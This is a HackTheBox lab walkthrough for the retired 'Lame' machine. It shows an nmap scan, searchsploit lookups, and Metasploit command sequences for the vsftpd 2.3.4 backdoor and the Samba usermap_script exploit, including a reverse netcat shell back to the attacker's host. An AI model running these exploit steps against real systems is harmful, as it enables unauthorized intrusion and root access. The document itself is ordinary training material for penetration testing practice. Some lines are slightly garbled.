Lame HackTheBox Walkthrough
This is Lame HackTheBox Walkthrough. In this writeup, I have demonstrated how I rooted Lame HackTheBox Machine in very simple language. Before starting let us know something about this machine. It is a
Linux machine with difficulty level
10.10.10.3. This machine is
retired so you will require
VIP subscription to access this machine.
So first of all connect your PC with VPN and confirm the connectivity by pinging the IP address 10.10.10.3. If you are not able to ping lame machine after connecting to VPN make sure lame machine is running on the lab. Start the machine first, if it is not running then ping it again. If all correct then start hacking the machine.
I started by
scanning the machine. For this purpose, a port scanner is used [we generally scan the machine so that we can
banner grab the services running over it and this gives us an idea how to proceed further].
Nmap (a well-known port scanner) gave the following result.
$nmap -sC -sV -oN lame_scan 10.10.10.3
Nmap scan revealed that ports
445 are open.
FTP is running over port 21,
SSH is running over 22 and
SMB is running over ports 139 & 445. As soon as we get some open ports and services running over them, our next step should be to enumerate each services in depth so that we can get some useful information from them.
vsftpd 2.3.4 server is running over port 21. So lets us check if any exploit is present for this version. Used
searchsploit tool to search available exploit for
vsftpd service. Searchsploit gave the following result.
$searchsploit vsftpd 2.3.4 //This will search available exploit over exploit-db.com
According to the result,
vsftpd 2.3.4 service has a metasploit module which allows Backdoor Command Execution. So used metasploit tool to execute this exploit.
$msfdb run // To start metasploit-framework along with database
msf5 > search vsftpd
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 > set payload cmd/unix/interact
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
vsFTPd 2.3.4 is vulnerable but no session created after exploit execution. This may be because it requires password or admin has blocked to run exploit over port 21. Left it here and moved forward for further enumeration. Nmap default script
ftp-anon revealed that anonymous login is allowed. So tried to login anonymously using credential
anonymous:anything. Logged in successfully. Then tried to list folder content but it appears that ftp folder is
empty. Even couldn’t change the current directory.
Left it here and then moved to enumerate services on next port.
Samba 3.0.20 is running on port 445 according to
smb-os-discovery nmap script. So as usual, my next step is to search the public exploit for the given version 3.0.20. Searched using searchsploit for available exploits.
$searchsploit samba 3.0.20
According to the above result, a metasploit module named
usermap_script is present. So used this exploit and successfully got
command shell after exploitation.
msf5 > search usermap_script
msf5 > use exploit/multi/samba/usermap_script
msf5 > set payload cmd/unix/reverse_netcat
msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.5
msf5 exploit(multi/samba/usermap_script) > exploit
We got a shell. However, the shell is not in form of
shell prompt or fully qualified Linux shell. So upgraded the shell using python
Upgrading the Shell
$which python //To check whether python is installed on remote machine
$shell // To get a shell prompt
We have upgraded the shell. Now it is time to capture the flag.
Note: We can notice that we are root after getting shell, which means we have full permission to do anything. Moreover, our shell is root shell and we do not require
privilege escalationany more.
Capture User Flag
Capture Root Flag
This was how I rooted Lame HackTheBox machine. This was very simple box. Hope you guys have liked my methodology and have learnt some new things. Share your experience with us by commenting. And for any help & suggestion related to walkthrough feel free to write us at [email protected].